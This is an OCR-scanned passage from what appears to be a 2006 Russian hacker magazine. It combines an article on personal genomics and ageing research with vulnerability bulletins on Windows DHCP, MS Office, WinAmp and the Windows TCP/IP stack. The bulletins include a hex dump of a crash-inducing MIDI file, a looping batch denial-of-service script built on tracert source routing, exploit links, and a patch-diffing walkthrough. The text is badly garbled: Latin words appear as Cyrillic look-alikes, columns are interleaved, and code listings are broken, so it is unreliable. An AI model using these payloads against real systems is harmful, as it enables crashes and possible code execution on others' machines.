Знание — сила. И полное знание содержа- 
ния нашей главной проги, записанной в ДНК у 
тебя и всех остальных, может полностью пере- 



вернуть вверх тормашками всю современную 
медицину и фармакологию. Представь себе: 
лет через 20 ты заболеваешь, например, хро- 
ническим насморком, приходишь в больницу, 
даешь оператору на компакте или флэшке свой 
персональный ДНК-код (ты не знаешь, что это, 
просто-напросто полностью записанная инфа в 
буковках АГЦТ(У) о твоей ДНК размером в 60-70 
мегабайт) и формулируешь проблему. Доктор, 
посмотрев базу данных о твоих белках, пишет 
тебе апдейт, синтезирующий пригодные толь- 
ко для тебя ферменты, останавливающие на- 
сморк и укрепляющие иммунитет. Приняв пару 
раз изготовленные по проге толпой микробов 
таблетки, ты избавляешься от насморка за не- 
сколько дней без всякихпобочныхпоследствий. 
Ты, конечно, можешь сказать, что, попив пару 
раз Соісігех, можешь избавиться от насморка 
и сегодня, нафига 20 лет ждать? Но вот рак, 
СПИД, старение и синдром известного Дауна 
Соібгех'ом не вылечишь. Кто знает, от чего у 
тебя насморк, — может, он обусловлен более 




серьезным и проблемами с иммунитетом, кото- 
рые будут видны только после изучения ТВОЕЙ 
ДНК. 

Дело - заключается в том, что нужно получить 
этот самый компакт с оцифрованной ДНК, сдав 
анализы. Да вот незадача — последний раз та- 
кая процедура закончилась в 2003 году, ее про- 
водили совместно 18 государств, заняла она 10 
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лет и стоила 3 миллиарда убитых енотов. 

Зато в ходе единственного проекта чело- 
веческого генома было расшифровано 
80-100 тысяч генов, а это поможет хотя 
бы в общем делать генные лекарства, предна- 
значенные именно для человеческиххворей. До 
расшифровки персонального геномаеще дале- 
ко, но уже есть «быстрые» секвенаторы, протя- 
гивающие ДНК через нанопоры и по изменению 
электрических потенциалов в них записываю- 
щие буковки А, Г, Ц, Т в последовательности. 
Если бы их использовали в проекте человечес- 
кого генома, то вместо 1 0 лет потребовалось бы 
всего двадцать часов. 

Принцип действия быстрого секвенаторапрост: 
отрицательно заряженная одноцепочечная 
ДНК проходит через нанометровую пору в мем- 
бране, наружная поверхность которой несет 
отрицательный заряд, а внутренняя — положи- 
тельный. Как только очередной нуклеотид пе- 
рекрывает внутреннее отверстие в поре, элект- 
ропроводность мембраны (измеряемая здесь в 
пикоамперах) изменяется. Нуклеотиды разного 
типа, из которых состоит цепочка ДНК, немного 
различаются по 
размерам и поэ- 
тому закрывают 
пору в большей 
или меньшей сте- 
пени и на разное 

время. Соответственно, изменяется и электро- 
проводность. 

Если в ближайшем будущем ученым удастся 
повысить разрешающую способность метода, 
то каждый скачок электропроводности будет 
отвечать прохождению через пору одного нук- 
леотида, и с диаграммы, получаемой на выходе, 
можно будет считывать искомые буковки. 



Поэтому пока разработчики программы « Рево- 
люционные методы секвенирования генома», 
финансируемой Национальными институтами 
здравоохранения США, ориентируют ее участ- 
ников на то, чтобы снизить стоимость секвени- 
рования генома человека до $1 00 тысяч к 2009 
году и до $1 тысячи к 20 14 году. Первую группу 
ученых, которым удастся решить задачу, ждет 
солидное денежное вознаграждение. И, похо- 
же, цель уже близка. Есть основания полагать, 
что менее чем через четыре года подобная про- 
цедура будет стоить около $20 тысяч. 

Пройдет немало времени, прежде чем мы 
ощутим, насколько изменилась наша жизнь 
с наступлением эры персонифицированной 
геномики — так называется наука об изучении 
генома (набора всех наших генов). 

О Долго жить не запретишь 

Раз мы машины, хоть и сложные, возникает 



Рибосома - мини-срабри 
с «открытым кодом» 



логичный вопрос: можно ли и для 
нас наделать запчастей, чтобы, 
постепенно заменяя их, не изна- 
шиваться, то есть не умирать? 
Одно из решений лежит прямо на поверхности: 
можно заставить биофабрики делать такие же 
органы, каку нас, синтезированные изтакихже 
точно белков, — это не вызовет их отторжения. 
И тогда придется проходить регулярные курсы 
пересаживания всех органов (кроме мозгов, 
конечно). Сейчас на основе ГМО пытаются 
сделать белковую структуру свиней как мож- 
но ближе к человеческой. Свиньи выбраны не 
случайно — их белковая биохимия ближе всех к 
человеку. Однако процесс старения — явление 
сложное, его простыми пересадками не оста- 
новишь. 

Но фундаментальные исследования всех из- 
вестных на сегодня механизмов старения уже 
привели к созданию препаратов, направлен- 
ных наборьбу с самыми главными «киллерами» 
организма — свободными радикалами. Их изу- 
чение привело к появлению нового многообе- 
щающего препарата, который сейчас проходит 
заключительные клинические испытания в био- 
фирме Азіга2епеса. Данный препарат абсор- 
бирует свободные радикалы, порождающие 
клеточные повреждения после инсульта, и его 
появление может взорвать рынок в 2008 году. 

А биотехническая компания Оегоп приступи- 
ла к испытанию на людях новой противорако- 
вой терапии, которая направлена на энзимы, 
сбрасывающие в исходное состояние тело- 
меры — крошечные молекулярные часы, даю- 
щие клеткам приказ о самоуничтожении пос- 
ле определенного количества делений (эти 
часы дают сбой в раковых клетках). Препарат, 
разработанный Оегоп, направлен на восста- 
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новлениѳ их функции с тем, чтобы раковые 
опухоли самоуничтожались по прошествии 
определенного времени. Некоторое время 
теломеры считались основным злом, которое 
старит нас независимо от того, насколько мы 
«реально износились». В некоторый момент 
часики пробивают 12, и твое тело начинает 
потихоньку дряхлеть. 

Искусственное дряхление ученые могут уже 
сейчас вызвать. Сделать это они смогли после 
изучения редкой болезни прогерии. Это синд- 
ром преждевременногостарения,прикотором 
организм человека за 1 2-1 5 лет после рожде- 
ния «проживает» 70-летний период жизни, то 
есть в 1 0-1 4 лет больной ребенок имеет такие 
изменения тканей организма, какие наблюда- 
ются у людей пожилого возраста. 

Старение организма протекает с невероятной 
скоростью, что сопровождается развитием 
атеросклероза сосудов, остеопорозом костей, 
выпадением волос, нарушением состояния 
челюстей и зубов, а впоследствии — сердца и 
мозга. Существует несколько форм прогерии, 
и практически все они сопровождаются серь- 



езным нарушением образо- 
вания белка ламина А в ре- 
зультате генной мутации. Эти 
мутации удалось выделить и 
повторить на животных. Мо- 
жет, мы с тобой доживем до 
того времени, когда резуль- 
таты изучения прогерии смо- 
гут продлить срок жизни, а не 
сократить его. 

Сам «ген старения» пока не 
найден. Но известно о том, что 
человек может быть носителем 
генов, способствующих замед- 
лению старения. 

В течение многих лет биологи полагали, что 
процесс старения является настолько слож- 
ным, затрагивает тысячи генов, что делает 
^практически невозможным его эффективную 
терапию. Но с 1 988 года появились сомнения 
благодаря изучению круглых червей нема- 
тод, длина которых состовляет всего лишь 
1 мм. Генетик Томас Джонсон, работающий 
сегодня в университете Колорадо, показал, 



Молекулярные машины- 
энзимы помогают генным 



инженерам разрезать и 
сшивать участки кода 
ДНК в нужных местах 



Секвенирование ДНК 
с помощью нанопор 



что изменение только 
одного гена под названи- 
ем аде-1 увеличило про- 
должительность жизни 
червей вдвое (до одного 
месяца). 

Под влиянием этихоткрытий в 1999 году была 
создана компания ЕІіхіг РІіагтасеіЛісаІз с ус- 
тавным капиталом в 56 миллионов долларов. 
Сегодня она надеется разработать препа- 
раты, которые будут блокировать действие 
натурального гормона грелина (дГігеІіп), 
способствующего секреции гормона роста 
и стимулирующего аппетит. ЕІіхіг намере- 
на проверить эту концепцию для лечения 
диабета и ожирения. Испытания на людях 
должны начаться уже в течение ближайших 
двух лет. 

Естественно, что кто девушку обедает, тот 
ее и танцует, поэтому нет ничего удивитель- 
ного в том, что всем нам известный Билли 
тайком вкладывает деньги в биотех, отчасти 
в развитие персональной геномики, атакже 
в компании, занимающиеся поиском «тор- 
мозов» старения. Подводит его нюх или нет 
— мы стобой узнаем летчерез 20. И нетпри- 
чин сомневаться в том, что кому- 
нибудь из ученых удастся при- 
тормозить старуху с косой. Мы 
же с тобой знаем: это большой 
и сложный механизм, и нужно 
время, чтобы его взломать. □□ 
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О ЫТ: удаленная дыра 
в ОСНР-сервисе 

Вгіе-Г 

11 июля 2006 Магіапо І\Іше 2 0\ Сгосе, сотруд- 
ник копании СУВЗЕС 3. А. ( сѵЬзѳс.сот ). опуб- 
ликовал сообщение о переполнении буфера в 
МісгозоЙ ѴѴіпбоѵѵз ОСНР-клиенте (технически 
реализованном как сервис), приводящем к 
возможности удаленного выполнения кода с 
привилегиями ЗУЗТЕМ, при условии, что ата- 
кующий и жертва находятся в одной подсети: 
сѵЬзес.сот/ѵиІп/СУВЗЕС-ЗесигіІѵ Рге Абѵізогѵ 
МісгозоЙ ѴѴіпбоѵѵз РНСР СЦепІ Зегѵісе 
Ветоіе ВиТТег Оѵегііоѵѵ.рсіі : сообщение тут же 
подхватила МісгозоД, выпустив оперативную 
заплатку вместе с описанием проблемы на 
ТесИМеЦ тісгозоіТсотДесИпеі/зесигіІѵ/ВиІІеІіп/ 
М306-036.тзрх . где уязвимости был присвоен 
критический уровень опасности. Аналогичную 
оценку выставила и французская компания 
РгЗІРТ : Ігзіг1.сот/епаІізИ/абѵізогіез/2006/2754 . 

Уязвимости подвержены следующие системы: 



ѴѴіпбоѵѵз 2000 РгоІеззіопаІ / Зіапбагб Зегѵег / Ехріоі^г 
Оа1асеп1егЗегѵег/АбѵапсебЗегѵег;ХРТаЫеіРС Компания СуЬзес 3. А. будет удерживать все 
/ Мебіа Сепіег / Ноте / РгоІеззіопаІ/РгоІеззіопаІ технические детали атаки (и сам ехріоіі) в те- 
х64ДЭаІасепІег Зегѵег /Абѵапсеб Зегѵег; Зегѵег чение 30 дней, после чего выложит их в пуб- 
2003 Зіапбагб / Зіапбагб х64 / ѴѴеЬ/ Епіегргізе / личный доступ (как раз к выходу журнала из 
Еп1егргізех64/Оа1асеп1ег/Оа1асеп1егх64со все- печати), 
ми установленными Зегѵісе Раск'ами. На І\ІТ и 9х 
эта угроза не распространяется. 




> Отключение ОНСР-клиента для предо- 
твращения атаки через системную консоль 



Зоіи-Моп 

а) установить заплатку от Місгозоіі, которую 
можно скачать с ирбаІе.тісгозоД.сот . Ь) от- 
ключить ОНСР-клиента через Панель Управле- 
ния -> Администрирование -> Службы -> ОНСР- 
клиент -> Свойства -> Тип запуска -> Вручную; 
Свойства -> Стоп; или из командной строки «зс 
зіор ОНСР -> зс сопіід ОНСР 5ІаП=бізаЫеб», 
при этом перезагружаться не обязательно. 
После останова ОНСР-сервиса все ІР-адреса 
локальной сети придется присваивать вручную 
(что легко осуществить дома, но намного слож- 
нее в корпоративной сети). На выделение ди- 
намических ІР-адресов по ОіаІ ІІр'у остановка 
ОСНР-сервиса никак не скажется (подробнее 
о ОСНР можно прочитать в ІЕТР РРС 2131 — гіс. 
пеШсШШті). 
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О М§ ОНісе: множествен- 
ные переполнения буфера 

/Вгіе-Г 

В июне-июлѳ 2006 года сразу несколь- 
ко независимых исследователей обна- 
ружили множество ошибок переполнения в 
Місгозой ѴѴогб/ЕхсеІ и других приложениях, об- 
рабатывающих документы М3 СЖісе, самая ковар- 
ная из которых была замечена 10 июля 2006 года 
хакером по прозвищу паѵееб (паѵеебаИ@дтаіІ 
сот ). Она относится к функции І_зСгеа!еІ_іпе, экс- 
портируемой библиотекой тзо.бІІ (или в более ста- 
рых версиях офиса — тзоЭ.сІІІ). Специальным об- 
разом созданный бос-файл вызывает обрушение 
ѴѴогсГа с ошибкой доступа, но также может пере- 
записывать произвольное двойное слово в памяти, 
позволяя осуществлять передачу управления на 
зГіеІІ-код: зесигіЫосиз.сот/агсИіѵе/1 /439649 . Сооб- 
щение быстро расползлось по сети: зесигііѵ.ппоѵ. 
ги/Спеууз345.И1пп1: зесигіМосиз.сот/ЬісІ/1 8905 . но 
Місгозой оказалась с ним категорически не соглас- 
на, опубликовав на своем Зесигі!у Везропзе Сепіег 
ВІод'е опровержение, что, мол, падать-то ѴѴогб па- 
дает, а вот возможность передачи управления на 
зГіеІІ-код весьма сомнительна: Ыоаз.іесИпеі.сот/ 
тзгс/агсІііѵе/2006/07/1 0/441 ООб.азрх : лично я после 
отладки и дизассемблирования придерживаюсь 
мнения паѵеесГа. 

Также была обнаружена кривизна в реализа- 
ции указателей на объекты, приводящая к воз- 
можности выполнения зГіеІІ-кода ( зесигіМосиз. 
сот/ЬісІ/1 8037 ). и уже появилась пара виру- 
сов-червей, распространяющихся через дыру 
ВасксІоог.Оіпѵѵиі ( зѵтапіес.сот/аѵсепіег/ѵепс/ 
баІа/Ьаскбоог.аіпѵѵиШітІ ) и Тгоіап.Мбгоррег.Н, 
( зесигііѵгезропзе.зѵтапіес.сот/аѵсепіег/ѵепс/ 
ба!аДго|ап.тбгоррег.И.И!т1 ). 

Имеются ошибки и в обработке графических 
файлов форматов ѲІР и РІ\КЗ, опять-таки при- 
водящие к возможности выполнения зГіеІІ-кода: 
(зесигіЫосиз.сопп/Ыб/18913 и зесигіЫосиз.сот/ 
Ыб/18915 ). Свойства объектов (ргореДу) и раз- 
борка (рагзіпд) строк не отстают от своих това- 
рищей и выполняют зГіеІІ-код не хуже остальных 
(зесигіЫосиз.сот/Ыб/18911 и зесигіЫосиз.сот/ 
Ыб/18912 ). Не остается без внимания и ЕхсеІ — в 
обработке стилей и выделении записей обнару- 
жены дефекты, приводящие к возможности вы- 
полнения зГіеІІ-кода: зесигіЫосиз.сот/Ыб/1 8872 . 
зесигіМосиз.сопп/Ыб/18422 и зесигіМосиз.сот/ 
Ыб/18885 . Плеяду ошибок завершает дыра в биб- 
лиотеке ГіІіпк.сІІІ, отвечающая за обработку стилей 




> Обрушение ѴѴіпАтр'а 
с 20Е-АЫАЮС1-ЗТ1Ю10-5 скином 

разных типов записей и при определенных обсто- 
ятельствах допускающая передачу управления на 
зловредный код: зесигі1ѵ.ппоѵ.ги/Ѳпеѵѵз270.ИіппІ . 

Тагде* 

Вся линейка продуктов М3 ОІІісе. 

Ехріоі-Ь 

• зесигіЫосиз.сот/баІа/ѵиІпегаЫІШез/ехрІоіІз/ 
МЗСЖісе тозбІІ рос.с : 

• боѵѵпІоабз.зесигіЫосиз.сот/ѵиІпегаЫІШез/ехрІоіІз/ 

ехсеі-гсе-пзгоскеі.іхі : 

• зесигіЫосиз.сот/баІа/ѵиІпегаЫІШез/ехрІоіІз/ 

ІЧапіка.хІз : 

• ЬзбракізІап.ога/боѵѵпІоабз/ѵѵогбРОС.с : 

Зоіи^іоп 

Некоторые из вышеперечисленных дыр успешно 
подтверждены МісгозоД, и для них выпущены за- 
платки: некоторые все еще остаются незалатанны- 
ми, поэтому не отрывай документов, полученных из 
ненадежных источников! 

О ѴѴіпАтр: переполнение 
буфера в тісіі 

Вгіе-Г 

19 апреля 2006 года в популярнейшем трЗ-про- 
игрывателеле ѴѴіпАтр от ЫиІІ-зоЙ был обнаружен 
дефект в библиотеке іп_тібі.бІІ, отвечающей за 
проигрывание тібі-файлов и некорректно про- 
веряющей правильность заполнения некоторых 
полей. В результате чего у атакующего появилась 
возможность «уронить» ѴѴіпАтр (который при этом 
настойчиво предлагает перезапустить систему, 
хотя ее можно и не перезапускать) или передать 
управление на зГіеІІ-код. Следующий 34-байтовый 



ё 



тібі-файл основательно сносит ѴѴіпАтр'у крышу: 

-файл, вызывающий обрушение ѴѴіпАтр'а 

0000:40 54 68 64 00 00 00 06 I 00 00 00 01 00 60 40 54 

0020:РР 00 

Поскольку ѴѴіпАтр может быть настроен так, что- 
бы проигрывать тібі-содержимое ѵѵеЬ-страничек 
вместо основного системного проигрывателя 
(многие пользователи именно так его и настраива- 
ют), угроза очередной вирусной эпидемии прини- 
мает довольно масштабный характер, особенно 
учитывая тот факт, что ѴѴіпАтр, в отличие от сис- 
темы, практически никто не обновляет. К тому же 
исходное сообщение о дыре осталось незамечен- 
ным, даже когда оно было опубликовано вторично 
— 29 мая 2006 года, — то есть ровно через месяц 
спустя. На Зесигііу-Росиз оно попало с огромным 
(и нехарактерным для него) опознанием — 1 9 июня 
2006 года ( зесигіМосиз.сот/ЬісІ/І 8507 ). 

Тагде-Ь 

Все версии ѴѴіпАтр'а до 5.21 включительно. 

Ехріоі* 

• зесигіЫосиз.сот/ба!а/ѵиІпегаЬіІі1іез/ехрІоі!з/ 
ѵѵіпатр тісіі ЬоІ.с : 

Зоіи-Моп 

а/ обнови свою версию ѴѴіпАтр'а до 5.22 (или 
выше), чтобы устранить несовместимость с ранни- 
ми ріид-іп'ами; 

б/ не используй ѴѴіпАтр для проигрывания тісіі- 
файлов, сбросив соответствующую галочку в фай- 
ловых ассоциациях, а также удалив файл іп_тібі.бІІ 
из каталога РІидіпз. 




Исследование упавшего ѴѴогсГа 
под отладчиком ОІІуОЬд 
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О ЫТ: удаленная дыра 
в ТСР/ІР- драйвере 

Вгіе-Г 

13 июня 2006 на Місгозой ТесИІЧеІ появилось со- 
общение о переполнении буфера в ТСР/ІР-драй- 
вере, позволяющее «уронить» систему в голубой 
экран смерти и даже передать управление на збеІІ- 
код, выполняющийся с привилегиями ЗУЗТЕМ: 
тісгозоЙ.сотДесІіпе!/зесигі!ѵ/ВиІІе!іп/М306-032. 
тзрх : опасности был присвоен ітроіТапІ-статус, и 
через несколько часов она перекочевала н а ѵ\ллллл 
зесигііѵіосиз.сот и другие хакерские сайты. 



НКЕМ\ЗѴ5ТЕМ\СиггепіСоп1гоІЗе1\5егѵісез\Тсрір\ 
Рагатеіегз и перезагрузить компьютер, причем на 
«нормальную» маршрутизацию пакетов это никак 
не повлияет; в) заблокировать на брандмауэре 
ІР-пакеты с опциями 131 (І_ЗВВ: І_оозе Зоигсе-п- 
ВесогсІ Роиіе — свободная маршрутизация от 
источника с записью маршрута) и 1 37 (ЗЗРР: Зігісі 
Зоигсе-п-РесогсІ Роиіе — жесткая маршрутизация 
от источника с записью маршрута). Не путай их с 
портами — это не порты, а именно опции ІР-паке- 
тов, но, к сожалению, далеко не все персональные 
брандмауэры позволяют осуществлять столь гиб- 
кую фильтрацию. 



Тагдеіг 

Уязвимости подвержены следующие системы: 
І\ІТ ѴѴогкзІаІіоп/ЗіапбагсІ Зегѵег / ТегтіпаІ Зегѵег / 
Епіегргізе Зегѵег; ѴѴ2К Ргоіеззіопаі/Зіапсіагсі Зегѵег/ 
Оаіасепіег Зегѵег / Абѵапсеб Зегѵег; ХР ТаЫеІ РС / 
Мебіа Сепіег / Ноте / Ргоіеззіопаі / Ргоіеззіопаі х64/ 
Оаіасепіег Зегѵег / Абѵапсеб Зегѵег; Зегѵег 2003 
Зіапбагб/Зіапбагб х64 / ѴѴеЬ / Епіегргізе / Епіегргізе 
х64 / Оаіасепіег / Оаіасепіег х64 со всеми установ- 
ленными Зегѵісе Раск'ами. Другими словами, уяз- 
вима вся линейка ЫТ-подобных систем. На 9х эта 
угроза не распространяется. 

ЕхрІОІ+5 

• зесигіЫосиз.сот/баІа/ѵиІпегаЫІіІіез/ 
ехріоііз/і 8374-РоЗ-РоС.с : 
• зесигіЫосиз.сот/баІа/ѵиІпегаЫІіІіез/ 
ехріоііз/і 8374-РоЗ-РоС.1х1 : 

Зоіиііоп 

а) установить заплатку от МісгозоИ, которую мож- 
но скачать с ирбаіе.тісгозоіі.сот . б) отключить ІР 
Зоигсе Роиііпд (ІР-маршрутизацию от источника) 
путем создания параметра РізаЫеІРЗоигсеРоиІіпд 
типа РѴѴОРР со значением 2 в следующем ключе: 



Ееіаііг 

Дыру в ТСР/ІР обнаружил наш соотечественник 
Андрей Минаев (апаеІ3000@ИоіЬох.ги ). обратив- 
ший внимание на странное поведение системы при 
обработке ІР-пакетов с взведенной опцией свобод- 
ной/жесткой маршрутизации и промежуточным 
адресом, равным 0.0.0.0, что трактуется как «адрес 
данного узла». Если на целевой системе работал 
ІЧАТ-сервер, встроенный, в частности, в ѴѴіпбоѵѵз 
2000, то система выпадала в ВЗСЮ с ошибкой в 
ТСРІР.ЗУЗ, І\ІТОЗКВІ\ІІ_.ЕХЕ или начинала вести 
себя нестабильно, что вполне типично для ошибок 
переполнения с 01 71 «ударом по памяти » . 

Хакеры, называющие себя Лтту и Ву1еСобег+, 
тут же написали ехріоіі, представляющий собой 
простейший командный файл, запускаемый из- 
под ѴѴіпбоѵѵ 9х или ЫТ-подобных систем и устра- 
ивающий уделенному узлу настоящее харакири , 
причем атакующий может находится как внутри 
локальной сети, так и вне ее: 

Простейший ехріоіі, атакующий сервер пу- 
тем посылки пакетов со взведенной опцией 
Ьоозе $оигсе-п-ПесогсІ Ноиіе 



> Доработанный ехріоіі валит 
систему с 2-х пакетов 




РЕМ задаем ІР-адрес (или доменное имя) 
и узла-жертвы, которую мы будем валить 
ЗЕТіагдеіір=192.168.0.6 

■ 

ІгасеП-Гі 1 -\ 0.0. 0.0 %іагдеіір% 

1гасеП-Гі 1 0.0. 0.0 %іагдеіір% 

ДасеП-Гі 1 -\ 0.0. 0.0 %1агде1ір% 

РЕМ посылаем серверу эхо-пакет, чтобы выяснить, 
РЕМ жив ли он еще или уже упал смертью храбрых 
ріпд %1агде1ір% -п 1 II доіо епб 



4 * 4 4 

4 

I 

4 
4 

РЕМ если мы здесь — переход на епб не сработал: 
РЕМ сервер шлет нам привет, ну а мы продолжаем 
РЕМ слать ему ІР-пакеты, надеясь, что когда-нибудь 
РЕМ он все-таки упадет 
доіо гооі 

РЕМ сюда мы переходим, когда посланный серверу 
РЕМ эхо-пакет уже не возвращается к нам назад. 
РЕМ сервер упал?! сервер упал!!! может быть... 

■ 

■ 

@ЕсИо Зегѵег із сгазЬ 
@раизе 

■ 




Для эстетов хакер по кличке Ргебсіу из 
ВооіЗИеІІ Зесигііу (Згоир создал Си-версию 
ехріоііа, работающую как под І\ІТ/9х, так и под 
І_іпих: зесигіЫосиз.сот/баІа/ѵиІпегаЫІШез/ 

ехріоііз/і 8374-РоЗ-РоС.с : 

Чтобы понять, как работает ехріоіі, необходимо рас- 
смотреть заголовок ІР-пакета. 

Поле орііопз служит для задания дополнитель- 
ных опций, расширяющих возможности прото- 
кола ІР. В частности, интересующая нас опция 
131 (І_оозе Зоигсе-п-Ресогб Роиіе) и 137 (Зігісі 
Зоигсе-п-Ресогб Роиіе) описаны в РРС-791 ( гіс. 
пеШс791.И1т1 ). а также во множестве независи- 
мых источников, например энциклопедии «Аппа- 
ратных средств локальных сетей» Михаила Гука 
( зИор.рі1ег.сот/сИар1.рІп1тІ?іб=9785804601 1 3 ) 
или в «Протоколе ІР»: агіи.Ьегбѵапзк.пе1/~апсІѵ/ 
Іеіесот ІесИпоІоаѵ/1 522-4.И1т1#2.4.4 . 

Обе опции действуют практически одинаково и 
позволяют отправителю пакета самостоятельно 
выбирать маршрут следования. Разница свобод- 
ной и строгой маршрутизацией заключается лишь в 

>Узел 1 92.1 68.7.2 (работающий под 
управлением ѴѴ2К) благополучно пере- 
живает атаку и не падает 
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> Формат поля опций ІР-пакета 







при свободной/жесткой 



> Истинное содержимое файла 
ѴѴіпсіоѵѵ 52000-КВ91 7953-х86-В113.ЕХЕ марштузизации от источника 



> Формат ІР-заголовка 



том, что при свободной маршрутизации очередной 
узел навязанного маршрута может быть достигнут 
за любое количество переходов (также называ- 
емых хопами), а при жесткой — очередной узел 
должен быть достигнут за 1 переход, а если это 
невозможно, то пакет уничтожается с генерацией 
ІСМР-сообщения о невозможности доставки. 
Списокузлов, через которые должен пройти пакет, 
содержится в поле данных, которое вмещает до 9 
ІР-адресов, перечисляемых в порядке следова- 
ния. Поле ріг указывает на текущий номер обра- 
батываемого узла и каждый раз увеличивается на 
4, причем номер первого адреса равен 4. 
Рассмотрим пакет, направляющийся из узла X 
в узел У и проходящий через маршрутизаторы 
М 1 и М2. На выходе из узла X в поле « Эезііпаііоп 
Асісігезз» (адрес назначения) ІР-пакета со- 
держится адрес М 1 , а в списке «навязанных» 
адресов (в поле орііопз) — М2 и У, при этом ріг 
равен 4, то есть указывает на М2. По прибытии 
пакета на М1 из поля «навязанных» адресов из- 
влекается адрес, определяемый указателем ріг 
(в данном случае это М2) и копируется в поле 
«Эезііпаііоп Асісігезз», ріг увеличивается на 4, а 
поверх адреса М2 записывается адрес того ин- 
терфейса маршрутизатора М 1 , через который 
пакет будет направлен на М2 (это и называется 
«записью маршрута»). По прибытии на М2 вся 
процедура повторяется, и пакет передается 
конечному получателю У, а в поле опций оказы- 
вается записанным маршрут пересылки. Когда 
узел У получает пакет с опцией І_оозе Зоигсе/ 
3*гіс1 Зоигсе, он должен использовать записан- 
ный маршрут для обратной отправки отклика. 
Опции І_оозе/Зігісі Зоигсе Роиііпд могут быть ис- 
пользованы для несанкционированного проник- 
новения через неправильно настроенный бранд- 
мауэр: в поле сіезііпаііоп асісігезз устанавливается 
разрешенный адрес, и пакет благополучно про- 
пускается брандмауэром, далее из поля опций из- 
влекается запрещенный адрес (который забывает 
проверить брандмауэр), и пакет перенаправляется 
по навязанному маршруту прямиком к атакуемому 
узлу, но к описываемой дыре в ТСР/ІР-протоколе 
эта особенность никак не относится. 



Теперь, учитывая все вышесказанное, попробуем 
разобраться с ехріоіі'ами. Ключ командной строки 
-\ ѴѴіпсІоѵѵ-утилиты ігасеЩ соответствующий ключу - 
д Ыпих-угил иты ігасегоиіе, задает свободный выбор 
маршрута по списку узлов, среди которых присутс- 
твует только один узел — О.О.О.О. Это специальный 
ІР-адрес,буквальнообозначающий«данныйузел». 
Ключ -И утилиты ігасеД (соответствующий ключу -т 
утилиты ігасегоиіе) ограничивает максимальное 
число переходов при поиске следующего назна- 
ченного узла, равное в данном случае 1 , то есть мы 
как бы имитируем «Зігісі Зоигсе Роиііпд» (на кото- 
рый ігасегеДгасегоиіе не способны) на основе оп- 
ции «І_оозе Зоигсе Роиііпд», поддерживаемой ути- 
литами трассировки. Что же получается в итоге? 

А вот ни хрена не получается! Мне, несмотря на все 
усилия, так и не удалось завалить ни одну систему 
из списка уязвимых: ни в локальной сети, ни через 
интернет, ни из-под ѴѴіпсІоѵѵз, ни из-под І_іпих. Пре- 
жде всего в Си-версии ехріоіі'а допущена грубая 
ошибка, ограничивающая предельную длину ІР- 
адреса всего 9 знаками, то есть при попытке атако- 
вать, например, «192.168.7.2», ІР-адрес усекается, 
и атакуется несуществующий узел «192.168.7». 
Замена всех з1гпса!(х,у,9) на з1гпса1(х,у,15) решает 
проблему (естественно, размеры буферов необ- 
ходимо увеличить тоже), но атакуемые узлы упорно 
падать не хотят. Почему?! 

Запускаем зпіііег и смотрим на содержимое от- 
правляемых пакетов. Видно, что адрес О.О.О.О во- 
обще не попадает в «навязанный» списокузлов, 
и вместо него там оказывается сіезііпаііоп-адрес, 
продублированный в соответствующем поле 
ІР-заголовка. Не исключено, что в какой-то кон- 
фигурации, которую мне так и не удалось воспро- 
извести, это вызывает помешательство І\ІТ, и она 
начинаетпосылать пакеты самасебе, провалива- 
ясь в бесконечный цикл, завершающийся пере- 
полнением стека. Но как бы там ни было, МісгозоД 
все-таки выпустила раІсИ и представляет боль- 
шой интерес распотрошить его и посмотреть, что 
же все-таки изменилось? 

Сейчас я продемонстрирую интересную технику 
поиска различий, которая неоднократно приго- 
дится нам, хакерам, в будущем. Берем в руки файл 



ѴѴіпсІоѵѵз2000-КВ917953-х86-ПІІ5.ЕХЕ (для ХР он 
будет слегка иным, но общий принцип действий ос- 
танется неизменным), загружаем его в Ніеѵѵ и ищем 
строку «МЗСР» (Місгозой СаЬ-РіІе), следующую за 
длинной последовательностью «РАОЭІІХКЗХХХ». 
Перемещаем курсор на первый символ «МЗСР» и 
нажимаем <*> (начало выделения блока), а затем 
топчем <СТРІ_-ЕІ\Ю> для перемещения в конец 
файла. Нажимаем <*> еще раз и записываем блок 
в файл клавишей <Р2>. Называем его, ну, скажем, 
ТСР.САВ и открываем любым подходящим архива- 
тором, например, РАР'ом. 

Там, среди прочего потребительского барахла, 
присутствующего во всех обновлениях, мы обна- 
жимТСРІР.ЗУЗ — то, что нужно! Вытаскиваем его из 
архива и сравниваем с имеющейся у нас версией. 
Сразу же бросается в глаза, что длины файлов 
не совпадают — 320,176 байт старой версии 
против 320,336 байт у новой, — поэтому прямое 
побайтовое сравнение невозможно! Очевидно, 
что драйвер был перекомпилирован, — необхо- 
димо прибегнуть к дизассемблированию, срав- 
нивая версии на уровне мнемоник машинных 
команд (вряд ли весь исходный текст драйвера 
был изменен). Дизассемблируем оба драйвера с 
помощью ЮА Рго и сохраняем полученные лис- 
тинги в файлы оісі.із! и пеѵѵ.Із! (от экспорта в азт- 
формат лучше воздержаться, поскольку у него не 
ладится с табуляцией, и мы не сможем отрезать 
операнды машинных инструкций, когда нам это 
будет необходимо). При отсутствии ЮА Рго можно 
воспользоваться утилитой ОІІМРВІІ\І из комплек- 
та поставки МісгозоІІ ѴізиаІ Зіисііо, запустив его с 
ключом /ЭІЗАЗМ. 

Полученные листинги можно сравнить либо «про- 
двинутой» графической утилитой ѵѵіпсШ, также 
входящий в состав МісгозойѴізиаІЗШсІіо, либо прос- 
той консольной Іс.ехе, позаимствованной из штат- 
ной поставки ѴѴіпсІоѵѵз І\ІТ. Тут же обнаружится сле- 
дующая пренеприятнейшая проблема: поскольку 
после рекомпиляции многие смещения измени- 
лись, то утилиты сравнения выдают ворох ложных 
срабатываний, в котором очень легко утонуть, так 
и не добравшись до истины. Например, различные 
версии файлов имеют разные смещения функций/ 
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> Сравнение разных версий файлов ѲІІІ- 
утилитой ѵѵіпсШ 



***** пеѵѵ.ізі 



00104В6 



ризГі сіѵѵогсі ріг [еах] 



00104В8 



саІІ 



зиЬ_2С1 ЕВ 



ООЮ4ВО 



есіі, еах 



***** ОІСІ.ІзІ 
00104В6 



ризГі сіѵѵогсі ріг [еах] 






саІІ 



зиЬ_2С100 



ООЮ4ВО 



есіі, еах 



Здесь вызывается одна и та же процедура (кто не 
верит — может посмотреть код самой процедуры), 
но утилитам сравнения этого ведь не объяснишь. 
А свой собственный скрипт писать лень. К тому же 
обнаруживается довольно странное поведение 
компилятора, иногда меняющего порядок следо- 
вания команд в новой версии драйвера: 



■ 



016С91 



есіх, есх 



016С93 



зГіг 



ІИ 



016С96 



зГіі 



есіх, 10'Н 



016С99 



есіх 



* ОІСІ.ІЗІ 



016С91 



есіх, есх 



016С93 



зГіі 



Щ 



016С96 



